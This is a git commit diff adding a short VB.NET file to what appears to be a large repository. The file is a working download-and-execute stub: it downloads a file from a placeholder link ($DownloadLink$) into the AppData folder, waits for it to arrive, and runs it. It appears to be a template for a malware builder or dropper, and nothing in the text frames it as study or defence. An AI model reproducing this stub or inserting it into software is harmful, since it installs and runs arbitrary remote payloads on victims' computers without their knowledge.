initial commit

This commit is contained in:
i2p
2026-08-27 11:04:21 -06:00
commit 07a49a8c50
937 changed files with 196477 additions and 0 deletions
@@ -0,0 +1,6 @@
Dim Expl As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\1" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath)
My.Computer.Network.DownloadFile($DownloadLink$, Expl)
Do Until IO.File.Exists(Expl) = True
System.Threading.Thread.Sleep(1000)
Loop
System.Diagnostics.Process.Start(Expl)